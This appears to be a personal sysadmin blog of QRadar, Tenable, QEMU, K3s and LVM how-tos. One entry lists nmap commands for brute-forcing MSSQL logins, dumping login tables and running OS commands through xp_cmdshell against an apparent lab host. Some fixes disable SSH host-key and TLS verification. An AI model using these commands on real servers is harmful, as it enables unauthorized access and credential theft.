Wednesday, November 9, 2022

Rename Nessus Scanner for Tenable.io

Step-by-step Instructions:
 

1. Log in to Tenable Core + Nessus using the link and credentials provided in your email. Be sure to check
the field Reuse my password for privileged tasks.
 

2. Click Terminal.
 

3. Type sudo /opt/nessus/sbin/nessuscli managed unlink
 

a. Note: If prompted for a password, type <nessus admin password>
 

4. Type sudo /opt/nessus/sbin/nessuscli managed link --key={your linking key} --cloud --name={your-name}_Scanner_Added
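The unlink and relink steps above can be combined into a small script. A minimal sketch — LINKING_KEY and SCANNER_NAME are placeholders you must fill in, and the run() guard only prints the commands until DRY_RUN is set to an empty value:

```shell
#!/bin/sh
# Relink this Nessus scanner to Tenable.io under a new name.
# LINKING_KEY and SCANNER_NAME are placeholders - set them before use.
LINKING_KEY="your-linking-key"
SCANNER_NAME="your-name_Scanner_Added"

# Dry-run guard: commands are only printed until DRY_RUN is set to empty.
run() { if [ -n "${DRY_RUN-1}" ]; then echo "+ $*"; else "$@"; fi; }

run sudo /opt/nessus/sbin/nessuscli managed unlink
run sudo /opt/nessus/sbin/nessuscli managed link \
    --key="$LINKING_KEY" --cloud --name="$SCANNER_NAME"
```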

Tuesday, August 30, 2022

QEMU: how to create ubuntu vm

Create Ubuntu VM

  • Create a disk image for the VM:
qemu-img create -f qcow2 disk.qcow2 10G
  • Create an empty file for persisting UEFI variables:
dd if=/dev/zero conv=sync bs=1m count=64 of=ovmf_vars.fd
  • Run qemu with the following command-line arguments:
qemu-system-aarch64 \
    -accel hvf \
    -m 2048 \
    -cpu cortex-a57 -M virt,highmem=off  \
    -drive file=/usr/local/share/qemu/edk2-aarch64-code.fd,if=pflash,format=raw,readonly=on \
    -drive file=ovmf_vars.fd,if=pflash,format=raw \
    -serial telnet::4444,server,nowait \
    -drive if=none,file=disk.qcow2,format=qcow2,id=hd0 \
    -device virtio-blk-device,drive=hd0,serial="dummyserial" \
    -device virtio-net-device,netdev=net0 \
    -netdev user,id=net0 \
    -vga none -device ramfb \
    -cdrom /path/to/ubuntu.iso \
    -device usb-ehci -device usb-kbd -device usb-mouse -usb \
    -monitor stdio
  • You should be able to install Ubuntu as normal.
  • If you want a desktop environment, you can install it with sudo apt-get install ubuntu-desktop.
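If you need to reach the guest over SSH, QEMU's user-mode networking can forward a host port into the VM. A sketch of the variant flag (the port numbers here are arbitrary choices):

```shell
# Replace the -netdev line in the command above with a port-forwarding variant:
#   -netdev user,id=net0,hostfwd=tcp::2222-:22
# Then, once the guest is running and has openssh-server installed:
#   ssh -p 2222 <user>@localhost
```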

Saturday, August 27, 2022

QRadar: SSH to host fails with error "No ECDSA host key is known for and you have requested strict checking"

Troubleshooting

Problem

SSH and any application that uses SSH to establish connections such as SCP and RSYNC fail to connect to an unmanaged QRadar® appliance. This issue affects procedures such as copying QRadar® SFS files to patch a host to match the Console's version before adding the appliance to the deployment.

 

Symptom

The SSH connection attempt fails with the error:
 
# ssh <Remote Host IP>
ERROR: No ECDSA host key is known for <Remote Host IP> and you have requested strict checking.
ERROR: Host key verification failed.

Cause

When "strict checking" is enforced, SSH connections to a host require the host's public key to already exist in the /root/.ssh/known_hosts file.
 
On older versions, a missing key entry generated a warning, and the administrator could choose Y to proceed with the connection or abort it.

Environment

QRadar® 7.4.2 and later.

Resolving The Problem

  1. Log in to the host originating the SSH connection.
  2. SSH to the remote host with strict checking disabled. This adds the entry to the /root/.ssh/known_hosts file.
    Note: This command is a one-time disabling of the strict check to allow for changes to the known_hosts file. Future attempts will use strict checking.
     
    # ssh <Remote Host IP> -o StrictHostKeyChecking=no
    Warning: Permanently added '<Remote Host IP>' (ECDSA) to the list of known hosts.
    root@<Remote Host IP>'s password:
  3. SSH to the remote host and the connection is established.
     
    # ssh <Remote Host IP>
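An alternative to disabling strict checking for one connection is to pre-populate known_hosts with ssh-keyscan. A sketch — the IP is a placeholder, and the run() guard only prints the commands until DRY_RUN is set to an empty value. Note that ssh-keyscan blindly trusts whatever key the remote host presents, so it is only appropriate on a trusted network:

```shell
#!/bin/sh
# Pre-populate root's known_hosts with the remote appliance's ECDSA key.
REMOTE_HOST="192.0.2.10"   # placeholder IP

# Dry-run guard: commands are only printed until DRY_RUN is set to empty.
run() { if [ -n "${DRY_RUN-1}" ]; then echo "+ $*"; else "$@"; fi; }

run sh -c "ssh-keyscan -t ecdsa $REMOTE_HOST >> /root/.ssh/known_hosts"
run ssh "$REMOTE_HOST"
```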

Reference:

https://www.ibm.com/support/pages/qradar-ssh-host-fails-error-no-ecdsa-host-key-known-and-you-have-requested-strict-checking

How to create private registry and configure Apphost for serving apps while installing

Development environment side: CentOS 8
--
[okanx@control-plane ~]$ cat /etc/docker/daemon.json
{
"insecure-registries" : ["172.16.60.128:5000"]
}


[okanx@control-plane ~]$ cat /opt/docker-registry/docker-compose.yml
version: '3'

services:
  registry:
    image: registry:2
    ports:
    - "5000:5000"
    environment:
      REGISTRY_STORAGE_FILESYSTEM_ROOTDIRECTORY: /data
    volumes:
      - ./data:/data

[aokanx@control-plane ~]$ cd /opt/docker-registry/
[aokanx@control-plane docker-registry]$ docker-compose up



Apphost side:
--

[root@apphost ~]# cat /etc/rancher/k3s/registries.yaml
mirrors:
  "172.16.60.128:5000":
    endpoint:
      - "http://172.16.60.128:5000"
[root@apphost ~]# manageAppHost registry --registry=172.16.60.128:5000
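Once the registry is up, it can be verified from the development host by pushing an image and listing the catalog. A sketch, assuming the same 172.16.60.128:5000 address and a locally available alpine image; the run() guard only prints the commands until DRY_RUN is set to an empty value:

```shell
#!/bin/sh
REGISTRY="172.16.60.128:5000"

# Dry-run guard: commands are only printed until DRY_RUN is set to empty.
run() { if [ -n "${DRY_RUN-1}" ]; then echo "+ $*"; else "$@"; fi; }

# Tag and push any local image into the private registry
run docker tag alpine:latest "$REGISTRY/alpine:latest"
run docker push "$REGISTRY/alpine:latest"

# List the repositories the registry now serves
run curl -s "http://$REGISTRY/v2/_catalog"
```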

QRadar SOAR (Resilient): Expired K3s certificates are not automatically rotated causing connection issues on Apphost

Problem

Cached K3s certificates are not cleared when certificates are automatically rotated.

K3s generates internal certificates with a 1-year lifetime. Restarting the K3s service automatically rotates certificates that have expired or are due to expire within 90 days. However, the version of K3s used with App Host does not clear the cached certificate, so the problem persists. The cache must therefore be cleared manually.



Symptom

Using the kubectl CLI tool results in the following error:

Unable to connect to the server: x509: certificate has expired or is not yet valid

Note: Apps that are currently running continue to run with no issues.

Cause

The currently used version of K3s (v1.18) does not clear the cached certificate, so even if the certificates are rotated by a K3s restart, the problem persists.

Diagnosing The Problem


Changes to an existing app that uses the SOAR platform do not succeed. This includes file changes, secret changes, deploy or undeploy, and upgrade requests.

When installing a new app, the status remains in a ‘Deploying’ state. A tooltip instructs the user to run sudo appHostPackageLogs. Running this command, or any other command that starts with kubectl, gives the following error:

#: kubectl get pods -A
Unable to connect to the server: x509: certificate has expired or is not yet valid

You can check the expiration date of the cached certificate by running the following command on the App Host server:
openssl s_client -connect localhost:6443 -showcerts < /dev/null 2>&1 | openssl x509 -noout -enddate 


Resolving The Problem

As a precautionary measure, back up the TLS directory.

sudo tar -czvf /var/lib/rancher/k3s/server/apphost-cert.tar.gz /var/lib/rancher/k3s/server/tls

Remove the following file.

sudo rm /var/lib/rancher/k3s/server/tls/dynamic-cert.json

Remove the cached certificate from a kubernetes secret.

sudo kubectl --insecure-skip-tls-verify=true delete secret -n kube-system k3s-serving

Restart the K3s service to rotate the certificates.

sudo systemctl restart k3s

Verify that kubectl commands function.

sudo kubectl get pods -A

Additionally, you can verify that all K3s internal certificates are no longer due to expire.

sudo su
for i in `ls /var/lib/rancher/k3s/server/tls/*.crt`; do echo $i; openssl x509 -enddate -noout -in $i; done

Or run the following to confirm the new date of your App Host certificate:

curl -v -k https://localhost:6443
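The resolution steps above can be collected into one script. A sketch using the same paths as the individual commands; the run() guard only prints the commands until DRY_RUN is set to an empty value:

```shell
#!/bin/sh
# Rotate expired K3s certificates on an App Host (paths from the steps above).
TLS_DIR=/var/lib/rancher/k3s/server/tls

# Dry-run guard: commands are only printed until DRY_RUN is set to empty.
run() { if [ -n "${DRY_RUN-1}" ]; then echo "+ $*"; else "$@"; fi; }

run sudo tar -czvf /var/lib/rancher/k3s/server/apphost-cert.tar.gz "$TLS_DIR"  # backup first
run sudo rm "$TLS_DIR/dynamic-cert.json"                                       # drop cached cert
run sudo kubectl --insecure-skip-tls-verify=true delete secret -n kube-system k3s-serving
run sudo systemctl restart k3s                                                 # rotate certificates
run sudo kubectl get pods -A                                                   # verify kubectl works
```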

 

 

Reference:

https://supportcontent.ibm.com/support/pages/expired-k3s-certificates-are-not-automatically-rotated-causing-connection-issues

QRadar: log source management legacy url

If you cannot access the Log Source Management app, you can try the legacy URL:

https://10.10.2.10/console/do/core/genericsearchlist?appName=eventviewer&pageId=SensorDeviceList

Friday, August 26, 2022

How to filter QRadar peaks and solve performance issues

Step 1:

Get peak date time information from logs

cat qradar.log |grep SourceMonitor |grep ecs-ec-ingress |sed -r 's#^(.+?)::.+ Peak in the last 60s: (.+?)\. Max Seen.+#\1 \2#'

 

Step 2:

Go to QRadar UI and query that time period and group by EventID or SourceIP for detecting root cause of the problem.


Step 3: 

If the traffic causing the peaks is abnormal, try to drop the unnecessary traffic at the log source level by solving the root cause of the problem, if possible.
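After extracting "timestamp value" pairs in Step 1, the largest peaks can be listed first with a numeric sort. A runnable sketch on hypothetical sample lines shaped like the SourceMonitor messages the Step 1 pipeline matches:

```shell
#!/bin/sh
# Extract "timestamp peak-value" pairs and list the biggest peaks first.
# The sample lines below are hypothetical, mimicking the SourceMonitor
# log format the Step 1 sed command parses.
extract() { sed -E 's#^(.+):: .*Peak in the last 60s: ([0-9]+)\. Max Seen.*#\1 \2#'; }

extract <<'EOF' | sort -k4,4 -rn | head -3
Aug 26 10:15:01:: ecs-ec-ingress SourceMonitor Peak in the last 60s: 21000. Max Seen 60000
Aug 26 10:16:01:: ecs-ec-ingress SourceMonitor Peak in the last 60s: 54000. Max Seen 60000
Aug 26 10:17:01:: ecs-ec-ingress SourceMonitor Peak in the last 60s: 12000. Max Seen 60000
EOF
```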

QRadar: How to export all referencedata

 /opt/qradar/bin/contentManagement.pl -a export -c referencedata -i all -e

Wednesday, August 17, 2022

Get IP count stats for syslog traffic

 tcpdump -nns0 -i any -c 100000 dst port 514 |awk '{print $3}' |cut -d. -f1-4 |sort -V |uniq -c |sort -n

Tuesday, August 9, 2022

QRadar: snmpwalk: Failure in sendto (Operation not permitted)

[root@console snmp]# snmpwalk -Os -c public -v 2c 127.0.0.1:8001 iso.3.6.1.2.1.1.1
snmpwalk: Failure in sendto (Operation not permitted)



I solved it by changing the port number to 8002 and adding the following iptables rules.

# Default iptables rules block 8001 traffic.

[root@console ~]# grep -HR 8001 /etc/* 2>/dev/null |grep REJECT
/etc/sysconfig/iptables:-A INPUT -p tcp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A INPUT -p udp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A OUTPUT -p tcp --dport 8001 -j REJECT
/etc/sysconfig/iptables:-A OUTPUT -p udp --dport 8001 -j REJECT

# solution

[root@console ~]# iptables -I INPUT -p udp -m udp --dport 8002 -j ACCEPT
[root@console ~]# iptables -I OUTPUT -p udp -m udp --sport 8001 -j ACCEPT

[root@console ~]# iptables-save
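Note that iptables-save on its own only prints the running rules to stdout. For the new rules to survive a reboot, they would need to be written back to the rules file. A sketch, assuming the standard RHEL path (bear in mind that QRadar manages this file itself, so manual changes may be overwritten by the product); the run() guard only prints the command until DRY_RUN is set to an empty value:

```shell
#!/bin/sh
# Dry-run guard: commands are only printed until DRY_RUN is set to empty.
run() { if [ -n "${DRY_RUN-1}" ]; then echo "+ $*"; else "$@"; fi; }

# Redirection needs its own shell, hence sh -c
run sh -c 'iptables-save > /etc/sysconfig/iptables'
```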

QRadar: extract test steps of a specific offense rule

 /opt/qradar/support/extractRules.py -o QRadarRules.tsv 

# psql -t -A -U qradar -c "SELECT rule_data FROM custom_rule WHERE id=100311" | xmllint --xpath "//rule/testDefinitions/test/text" - | perl -MHTML::Entities -pe 'decode_entities($_);' |sed -e 's/<[^>]*>//g'

QRadar: Ariel query for getting related usernames in an offense

 AQL query:

SELECT username FROM events  WHERE INOFFENSE(ID) GROUP BY username

QRadar: Ariel query for getting related remote IPs in an offense

AQL query for getting remote IP addresses related to a specific offense:

select distinct destinationip from events where INOFFENSE(633) TIMES OFFENSE_TIME(633) AND eventdirection IN ('L2R', 'R2R') 
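Such AQL queries can also be launched from the command line through QRadar's Ariel REST API. A sketch — the console IP and SEC token are placeholders, and the run() guard only prints the command until DRY_RUN is set to an empty value:

```shell
#!/bin/sh
CONSOLE="10.10.2.10"          # placeholder console IP
SEC_TOKEN="your-sec-token"    # placeholder authorized service token

# Dry-run guard: commands are only printed until DRY_RUN is set to empty.
run() { if [ -n "${DRY_RUN-1}" ]; then echo "+ $*"; else "$@"; fi; }

# Create an Ariel search; the response contains a search_id to poll for results
# (query_expression is URL-encoded by hand here).
run curl -k -s -X POST -H "SEC: $SEC_TOKEN" \
    "https://$CONSOLE/api/ariel/searches?query_expression=SELECT%20username%20FROM%20events%20WHERE%20INOFFENSE(633)%20GROUP%20BY%20username"
```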


Tuesday, August 2, 2022

nmap scripts for mssql servers

 nmap -p 1433 10.0.30.0/24

nmap --script ms-sql-info -p 1433 10.0.30.33

nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt 10.0.30.33

nmap -p 1433 --script ms-sql-empty-password 10.0.30.33

nmap -p 1433 --script ms-sql-query --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-query.query="SELECT * FROM master..syslogins" 10.0.30.33 -oN output.txt
gvim output.txt

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="ipconfig" 10.0.30.33

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=admin,mssql.password=anamaria,ms-sql-xp-cmdshell.cmd="type c:\flag.txt" 10.0.30.33
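All of the ms-sql NSE scripts above can also be selected at once with a wildcard (nmap accepts shell-quoted wildcards in --script). A sketch using the same placeholder credentials as above; the run() guard only prints the command until DRY_RUN is set to an empty value:

```shell
#!/bin/sh
# Dry-run guard: commands are only printed until DRY_RUN is set to empty.
run() { if [ -n "${DRY_RUN-1}" ]; then echo "+ $*"; else "$@"; fi; }

# Run every ms-sql-* NSE script against the target in one pass
run nmap -p 1433 --script "ms-sql-*" \
    --script-args mssql.username=admin,mssql.password=anamaria \
    10.0.30.33
```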

QRadar SOAR: How to increase partition size by using a new disk on RHEL with LVM

Steps to add a new hard disk to LVM on an IBM Security SOAR appliance running Red Hat Linux with LVM support:

1. In vSphere client, add a new hard disk at Virtual Device Node SCSI (0: 1).

2. SSH to the server.

3. Get the host bus number:
sudo grep mpt /sys/class/scsi_host/host?/proc_name
The response is similar to
/sys/class/scsi_host/host2/proc_name:mptspi

4. Rescan for new disks on host bus 2:
echo "- - -" | sudo tee /sys/class/scsi_host/host2/scan

5. Make sure new disk /dev/sdb is added to the system:
sudo fdisk -l

6. Create a new partition on /dev/sdb with file system type 8e (Linux LVM):
sudo fdisk /dev/sdb

=======
Command (m for help): n
Select (default p): p
Partition number (1-4, default 1): 1
First sector (a-b, default a): [Enter to use the default value]
Last sector, +sectors or +size{K,M,G} (a-b, default b): [Enter to use the default value]
Command (m for help): t
Hex code (type L to list all codes): 8e
Command (m for help): p
Command (m for help): w
=======

7. Create a physical volume for LVM:
sudo pvcreate /dev/sdb1

8. Get the volume group name (VG Name):
sudo vgdisplay

9. Extend the 'resilient' volume group by adding in the physical volume of /dev/sdb1:
sudo vgextend resilient /dev/sdb1

10. Scan all disks for physical volumes:
sudo pvscan

11. Check the volume group name (VG Name) again to make sure free space is added:
sudo vgdisplay

12. Display the path of the logical volume (LV Path):
sudo lvdisplay

The following assumes that you want to split the new disk across multiple logical volumes.

13. Extend the logical volumes:
sudo lvresize --resizefs --extents +80%FREE /dev/resilient/root
sudo lvresize --resizefs --extents +100%FREE /dev/resilient/co3

The previous commands allocate 80% of the free space to the "/dev/resilient/root" logical volume, and then allocate the remaining 20% to "/dev/resilient/co3".

14. Display the disk space usage to ensure new space is added:
sudo df -h
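Steps 7 through 14 can be gathered into one script once the new /dev/sdb1 partition exists. A sketch using the same volume group and LV paths as above; the run() guard only prints the commands until DRY_RUN is set to an empty value:

```shell
#!/bin/sh
# Grow the 'resilient' volume group with /dev/sdb1 and spread the new space
# 80/20 across the root and co3 logical volumes (paths from the steps above).

# Dry-run guard: commands are only printed until DRY_RUN is set to empty.
run() { if [ -n "${DRY_RUN-1}" ]; then echo "+ $*"; else "$@"; fi; }

run sudo pvcreate /dev/sdb1
run sudo vgextend resilient /dev/sdb1
run sudo lvresize --resizefs --extents +80%FREE /dev/resilient/root
run sudo lvresize --resizefs --extents +100%FREE /dev/resilient/co3
run sudo df -h
```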

 

 

Reference:

 https://www.ibm.com/support/pages/node/1160644

Thursday, January 27, 2022

ERROR on ../../tmp/openshift-install--761813450/main.tf line 44, in resource "vsphereprivate_import_ova" "import":

 Problem:

..

DEBUG vsphere_tag_category.category: Creation complete after 0s [id=urn:vmomi:InventoryServiceCategory:f49160e4-a017-404f-9ecf-88b93e02f300:GLOBAL]
DEBUG vsphere_tag.tag: Creating...                 
DEBUG vsphere_tag.tag: Creation complete after 0s [id=urn:vmomi:InventoryServiceTag:75e6da39-1493-4760-a360-5708375c1e49:GLOBAL]
DEBUG vsphereprivate_import_ova.import: Creating...
ERROR                                              
ERROR Error: failed to find provided vSphere objects: failed to find a host in the cluster that contains the provided datastore
ERROR                                              
ERROR   on ../../tmp/openshift-install--761813450/main.tf line 44, in resource "vsphereprivate_import_ova" "import":
ERROR   44: resource "vsphereprivate_import_ova" "import" {
ERROR                                              
ERROR                                              
FATAL failed to fetch Cluster: failed to generate asset "Cluster": failed to create cluster: failed to apply Terraform: failed to complete the change

..

Root cause of the problem:

This issue was caused by trying to use a datastore that was not shared storage on a cluster with multiple hypervisors.

 

Sunday, January 23, 2022

Saturday, January 22, 2022

Bulma.io: the modern CSS framework that just works.

 Bulma is a free, open source framework that provides ready-to-use frontend components that you can easily combine to build responsive web interfaces.

 https://bulma.io/

Themes:

https://jenil.github.io/bulmaswatch/